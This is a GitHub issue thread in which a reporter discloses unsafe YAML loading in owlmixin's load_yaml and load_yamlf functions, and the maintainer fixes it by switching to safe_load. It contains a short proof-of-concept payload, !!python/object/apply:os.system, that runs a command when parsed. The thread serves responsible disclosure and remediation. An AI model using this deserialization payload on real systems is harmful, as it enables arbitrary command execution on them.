Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

load_yaml and load_yamlf methods is vulnerable #12

Closed
Joel-MalwareBenchmark opened this issue Nov 7, 2017 · 2 comments
Closed

load_yaml and load_yamlf methods is vulnerable #12

Joel-MalwareBenchmark opened this issue Nov 7, 2017 · 2 comments
Assignees
@tadashi-aikawa
Milestone
2.0.0a12

Comments

@Joel-MalwareBenchmark
Copy link

from owlmixin import util
util.load_yaml('!!python/object/apply:os.system ["calc.exe"]')
util.load_yamlf('joel.yml','utf-8')
#'joel.yml':!!python/object/apply:os.system ["calc.exe"]

Hi, there is a vulnerability in load_yaml and load_yamlf methods in util.py, please see PoC above. It can execute arbitrary python commands resulting in command execution.
@tadashi-aikawa
Copy link
Owner

Thank you for your kind report!
I will fix the problem as soon as possible by replacing load to safe_load.

@tadashi-aikawa tadashi-aikawa self-assigned this Nov 7, 2017
@tadashi-aikawa tadashi-aikawa modified the milestones: 2.0.0a12, 1.2.1 Nov 7, 2017
tadashi-aikawa added a commit that referenced this issue Nov 7, 2017
@tadashi-aikawa
😱 Fix vulnerability of load_yaml and load_yamlf (#12)
5d05753
@tadashi-aikawa
Copy link
Owner

Fix 2.0.0a12

# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees

@tadashi-aikawa tadashi-aikawa

Labels
None yet
Projects
None yet
Milestone
2.0.0a12
Development

No branches or pull requests
2 participants
@tadashi-aikawa @Joel-MalwareBenchmark